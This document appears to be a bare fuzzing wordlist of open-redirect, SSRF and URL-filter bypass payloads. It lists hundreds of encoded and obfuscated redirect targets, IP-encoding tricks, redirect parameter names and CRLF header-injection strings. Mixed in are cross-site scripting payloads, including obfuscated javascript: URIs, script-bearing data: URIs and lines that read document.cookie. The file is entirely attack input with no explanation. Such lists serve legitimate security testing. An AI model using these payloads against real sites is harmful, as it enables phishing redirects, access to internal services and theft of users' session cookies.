/〱google.com
〱google.com
/〵google.com
〵google.com
/ゝgoogle.com
ゝgoogle.com
/ーgoogle.com
ーgoogle.com
/ｰgoogle.com
ｰgoogle.com
$2f%2f127.0.0.1%2f%2f
$2f%2f3627734734%2f%2f
$2f%2fgoogle.com
$2f%2fgoogle.com%2f%2f
/%09/google.com
//%09/google.com
///%09/google.com
////%09/google.com
%09Jav%09ascript:alert(document.domain)
/%09/javascript:alert(1)
/%09/javascript:alert(1);
/%09/whitelisted.com@google.com
//%09/whitelisted.com@google.com
///%09/whitelisted.com@google.com
////%09/whitelisted.com@google.com
/%09/www.google.com@google.com
//%09/www.google.com@google.com
///%09/www.google.com@google.com
////%09/www.google.com@google.com
&%0d%0a1Location:https://google.com
////127.0.0.1
///127.0.0.1
//127.0.0.1
/\127.0.0.1
/127.0.0.1
127.0.0.1
\152\141\166\141\163\143\162\151\160\164\072alert(1)
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
%2f$2f127.0.0.1
%2f$2f3627734734
%2f$2fgoogle.com
%2f127.0.0.1
%2f127.0.0.1//
%2f127.0.0.1%2f%2f
/%2f%2fgoogle.com
//%2f%2fgoogle.com
%2f3627734734
%2f3627734734//
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com
%2fgoogle.com//
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
/%5cgoogle.com
//%5cgoogle.com
///%5cgoogle.com
////%5cgoogle.com
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
/%5cwhitelisted.com@google.com
//%5cwhitelisted.com@google.com
///%5cwhitelisted.com@google.com
////%5cwhitelisted.com@google.com
/%5cwww.google.com@google.com
//%5cwww.google.com@google.com
///%5cwww.google.com@google.com
////%5cwww.google.com@google.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
action=https://www.google.com
action_url=https://www.google.com
";alert(0);//
allinurl:https://www.google.com
backurl=https://www.google.com
burl=https://www.google.com
callback_url=https://www.google.com
/cgi-bin/redirect.cgi?https://www.google.com
?checkout_url=https://www.google.com
click?u=https://www.google.com
clickurl=https://www.google.com
?continue=https://www.google.com
data=https://www.google.com
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:whitelisted.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
?dest=https://www.google.com
?destination=https://www.google.com
desturl=https://www.google.com
ext=https://www.google.com
forward=https://www.google.com
forward_url=https://www.google.com
?go=https://www.google.com
//google%00.com
/\google%252ecom
google%252ecom
../google.com
.google.com
/.google.com
/////google.com
/////google.com/
////\;@google.com
////google.com
////google.com/
////google.com//
///;@google.com
///\;@google.com
///google.com
///google.com/
///google.com//
//;@google.com
//\/google.com/
//\google.com
//google.com
//google.com/
//google.com//
/<>//google.com
/\/\/google.com/
/\/google.com
/\/google.com/
/\google.com
/google.com
<>//google.com
@google.com
\/\/google.com/
\\google.com
google.com
google.com%23@whitelisted.com
////google.com/%2e%2e
///google.com/%2e%2e
//google.com/%2e%2e
/google.com/%2e%2e
//google.com/%2E%2E
////google.com/%2e%2e%2f
///google.com/%2e%2e%2f
//google.com/%2e%2e%2f
////google.com/%2f..
///google.com/%2f..
//google.com/%2f..
//google.com/%2F.. 
/google.com/%2F.. 
////google.com/%2f%2e%2e
///google.com/%2f%2e%2e
//google.com/%2f%2e%2e
/google.com/%2f%2e%2e
//google.com//%2F%2E%2E
//google.com:80#@whitelisted.com/
//google.com:80?@whitelisted.com/
google.com/.jpg
//google.com\twhitelisted.com/
//google.com/whitelisted.com
//google.com\@whitelisted.com
google.com/whitelisted.com
//google.com\@www.google.com
//google%E3%80%82com
goto=https://www.google.com
http://00330.00072.0000326.00000316
http:00330.00072.0000326.00000316
http://00330.0x3a.54990
http:00330.0x3a.54990
http://00330.3856078
http:00330.3856078
http://0330.072.0326.0316
http:0330.072.0326.0316
http:%0a%0dgoogle.com
http://0xd8.072.54990
http:0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http:0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http:0xd8.3856078
http://0xd83ad6ce
http:0xd83ad6ce
http://[::127.0.0.1]
http:[::127.0.0.1]
http://[::127.0.0.1]
http:[::127.0.0.1]
http://3627734734
http:3627734734
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@[::127.0.0.1]
http:3H6k7lIAiqjfNeN@[::127.0.0.1]
http://3H6k7lIAiqjfNeN@[::127.0.0.1]
http:3H6k7lIAiqjfNeN@[::127.0.0.1]
http://3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@127.0.0.1
http:3H6k7lIAiqjfNeN@127.0.0.1
http://3H6k7lIAiqjfNeN@[::ffff:127.0.0.1]
http:3H6k7lIAiqjfNeN@[::ffff:127.0.0.1]
http://3H6k7lIAiqjfNeN@[::ffff:127.0.0.1]
http:3H6k7lIAiqjfNeN@[::ffff:127.0.0.1]
http://3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
http://3H6k7lIAiqjfNeN@whitelisted.com@google.com/
http://127.0.0.1
http:127.0.0.1
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://[::ffff:127.0.0.1]
http:[::ffff:127.0.0.1]
http://[::ffff:127.0.0.1]
http:[::ffff:127.0.0.1]
/http://google.com
/http:/google.com
http://.google.com
http:///////////google.com
http://;@google.com
http://google.com
http:/\/\google.com
http:/google.com
http:google.com
http://google.com%23.whitelisted.com/
http://google.com%2f%2f.whitelisted.com/
http://google.com%3F.whitelisted.com/
http://google.com%5c%5c.whitelisted.com/
http://google.com:80#@whitelisted.com/
http://google.com:80?@whitelisted.com/
http://google.com:80#@www.google.com/
http://google.com:80?@www.google.com/
http://google.com\twhitelisted.com/
http://google.com&www.google.com
http://google.com\www.google.com
https://%09/google.com
https://%09/www.google.com@google.com
/https://%5cgoogle.com
https://%5cgoogle.com
/https://%5cwhitelisted.com@google.com
https://%5cwhitelisted.com@google.com
/https://%5cwww.google.com@google.com
https://%5cwww.google.com@google.com
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//https://google.com//
/https://google.com
/https://google.com/
/https://google.com//
/https:google.com
https://////google.com
https://google.com
https://google.com/
https://google.com//
https:/\google.com
https:google.com
//https:///google.com/%2e%2e
/https://google.com/%2e%2e
https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
/https://google.com/%2f..
https://google.com/%2f..
/https:///google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://:@google.com\@whitelisted.com
https://google.com#whitelisted.com
https://google.com/whitelisted.com
https://google.com?whitelisted.com
https://google.com\whitelisted.com
https://:@google.com\@www.google.com
https://google%E3%80%82com
//https://whitelisted.com@google.com//
/https://whitelisted.com@google.com/
https://whitelisted.com.google.com
https://whitelisted.com;@google.com
https://whitelisted.com@google.com
https://whitelisted.com@google.com/
https://whitelisted.com@google.com//
/https://whitelisted.com@google.com/%2e%2e
https:///whitelisted.com@google.com/%2e%2e
//https://whitelisted.com@google.com/%2e%2e%2f
https://whitelisted.com@google.com/%2e%2e%2f
/https://whitelisted.com@google.com/%2f..
https://whitelisted.com@google.com/%2f..
/https:///whitelisted.com@google.com/%2f%2e%2e
/https://whitelisted.com@google.com/%2f%2e%2e
https:///whitelisted.com@google.com/%2f%2e%2e
https://whitelisted.com@google.com/%2f%2e%2e
/https://whitelisted.com@google.com/%2f.//whitelisted.com@google.com/%2f..
https://whitelisted.com/https://google.com/
/https://www.google.com
@https://www.google.com
//https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
https:///www.google.com/%2e%2e
//https://www.google.com/%2e%2e%2f
https://www.google.com/%2e%2e%2f
/https:///www.google.com/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
https:///www.google.com/%2f%2e%2e
https://www.google.com/%2f%2e%2e
//https://www.google.com@google.com//
/https://www.google.com@google.com/
https://www.google.com@google.com
https://www.google.com@google.com/
https://www.google.com@google.com//
/https://www.google.com@google.com/%2f..
https://www.google.com@google.com/%2f..
https://www.google.com/https://www.google.com/
/https://www.google.com@www.google.com/%2e%2e
https:///www.google.com@www.google.com/%2e%2e
//https://www.google.com@www.google.com/%2e%2e%2f
https://www.google.com@www.google.com/%2e%2e%2f
/https:///www.google.com@www.google.com/%2f%2e%2e
/https://www.google.com@www.google.com/%2f%2e%2e
https:///www.google.com@www.google.com/%2f%2e%2e
https://www.google.com@www.google.com/%2f%2e%2e
http://whitelisted.com@00330.00072.0000326.00000316
http:whitelisted.com@00330.00072.0000326.00000316
http://whitelisted.com@00330.0x3a.54990
http:whitelisted.com@00330.0x3a.54990
http://whitelisted.com@00330.3856078
http:whitelisted.com@00330.3856078
http://whitelisted.com@0330.072.0326.0316
http:whitelisted.com@0330.072.0326.0316
http://whitelisted.com@0xd8.072.54990
http:whitelisted.com@0xd8.072.54990
http://whitelisted.com@0xd8.0x3a.0xd6.0xce
http:whitelisted.com@0xd8.0x3a.0xd6.0xce
http://whitelisted.com@0xd8.3856078
http:whitelisted.com@0xd8.3856078
http://whitelisted.com@0xd83ad6ce
http:whitelisted.com@0xd83ad6ce
http://whitelisted.com@[::127.0.0.1]
http:whitelisted.com@[::127.0.0.1]
http://whitelisted.com%2egoogle.com/
http://whitelisted.com@3627734734
http:whitelisted.com@3627734734
http://whitelisted.com@127.0.0.1
http:whitelisted.com@127.0.0.1
http://www.google.com@00330.00072.0000326.00000316
http:www.google.com@00330.00072.0000326.00000316
http://www.google.com@00330.0x3a.54990
http:www.google.com@00330.0x3a.54990
http://www.google.com@00330.3856078
http:www.google.com@00330.3856078
http://www.google.com@0330.072.0326.0316
http:www.google.com@0330.072.0326.0316
http://www.google.com@0xd8.072.54990
http:www.google.com@0xd8.072.54990
http://www.google.com@0xd8.0x3a.0xd6.0xce
http:www.google.com@0xd8.0x3a.0xd6.0xce
http://www.google.com@0xd8.3856078
http:www.google.com@0xd8.3856078
http://www.google.com@0xd83ad6ce
http:www.google.com@0xd83ad6ce
http://www.google.com@[::127.0.0.1]
http:www.google.com@[::127.0.0.1]
http://www.google.com@3627734734
http:www.google.com@3627734734
http://www.google.com@127.0.0.1
http:www.google.com@127.0.0.1
http://www.google.com@[::ffff:127.0.0.1]
http:www.google.com@[::ffff:127.0.0.1]
http://www.google.com.google.com
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@[::127.0.0.1]
http:XY>.7d8T\205pZM@[::127.0.0.1]
http://XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@127.0.0.1
http:XY>.7d8T\205pZM@127.0.0.1
http://XY>.7d8T\205pZM@[::ffff:127.0.0.1]
http:XY>.7d8T\205pZM@[::ffff:127.0.0.1]
http://XY>.7d8T\205pZM@whitelisted.com+@google.com/
http://XY>.7d8T\205pZM@whitelisted.com@google.com/
?image_url=https://www.google.com
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javascript://%0aalert(1)
javascript://%250A1?alert(1):0
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250Alert(document.location=document.cookie)
//javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1)
/javascript:alert(1);
<>javascript:alert(1);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1)
javascript:alert(1);
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript://https://www.google.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
jaVAscript://www.google.com//%0d%0aalert(1);//
javascript://www.google.com?%a0alert%281%29
jump=https://www.google.com
jump_url=https://www.google.com
j?url=https://www.google.com
linkAddress=https://www.google.com
link=https://www.google.com
location=https://www.google.com
login=https://www.google.com
/login?to=https://www.google.com
logout=https://www.google.com
?next=https://www.google.com
origin=https://www.google.com
originUrl=https://www.google.com
/out/https://www.google.com
/out?https://www.google.com
page=https://www.google.com
pic=https://www.google.com
q=https://www.google.com
qurl=https://www.google.com
recurl=https://www.google.com
/redirect/https://www.google.com
?redirect=https://www.google.com
Redirect=https://www.google.com
?redirect_uri=https://www.google.com
?redirect_url=https://www.google.com
RedirectUrl=https://www.google.com
?redir=https://www.google.com
request=https://www.google.com
?return=https://www.google.com
?return_path=https://www.google.com
?return_to=https://www.google.com
?returnTo=https://www.google.com
ReturnUrl=https://www.google.com
rit_url=https://www.google.com
?rurl=https://www.google.com
service=https://www.google.com
sp_url=https://www.google.com
src=https://www.google.com
success=https://www.google.com
?target=https://www.google.com
tc?src=https://www.google.com
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
u1=https://www.google.com
u=https://www.google.com
uri=https://www.google.com
?url=https://www.google.com
url=//https://www.google.com
Url=https://www.google.com
?view=https://www.google.com
/\whitelisted.com:80%40google.com
whitelisted.com@%E2%80%AE@google.com
////whitelisted.com@google.com/
////whitelisted.com@google.com//
///whitelisted.com@google.com/
///whitelisted.com@google.com//
//whitelisted.com@google.com/
//whitelisted.com@google.com//
whitelisted.com.google.com
whitelisted.com;@google.com
////whitelisted.com@google.com/%2e%2e
///whitelisted.com@google.com/%2e%2e
////whitelisted.com@google.com/%2e%2e%2f
///whitelisted.com@google.com/%2e%2e%2f
//whitelisted.com@google.com/%2e%2e%2f
////whitelisted.com@google.com/%2f..
///whitelisted.com@google.com/%2f..
//whitelisted.com@google.com/%2f..
////whitelisted.com@google.com/%2f%2e%2e
///whitelisted.com@google.com/%2f%2e%2e
//whitelisted.com@google.com/%2f%2e%2e
//whitelisted.com+&@google.com#+@whitelisted.com/
//whitelisted.com@https:///google.com/%2e%2e
////www.google.com/%2e%2e
///www.google.com/%2e%2e
////www.google.com/%2e%2e%2f
///www.google.com/%2e%2e%2f
//www.google.com/%2e%2e%2f
////www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
//www.google.com/%2f%2e%2e
////www.google.com@google.com/
////www.google.com@google.com//
///www.google.com@google.com/
///www.google.com@google.com//
//www.google.com@google.com/
//www.google.com@google.com//
////www.google.com@google.com/%2f..
///www.google.com@google.com/%2f..
//www.google.com@google.com/%2f..
//www.google.com@https:///www.google.com/%2e%2e
////www.google.com@www.google.com/%2e%2e
///www.google.com@www.google.com/%2e%2e
////www.google.com@www.google.com/%2e%2e%2f
///www.google.com@www.google.com/%2e%2e%2f
//www.google.com@www.google.com/%2e%2e%2f
////www.google.com@www.google.com/%2f%2e%2e
///www.google.com@www.google.com/%2f%2e%2e
//www.google.com@www.google.com/%2f%2e%2e
/x:1/:///%01javascript:alert(document.cookie)/
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
//XY>.7d8T\205pZM@whitelisted.com+@google.com/
//XY>.7d8T\205pZM@whitelisted.com@google.com/
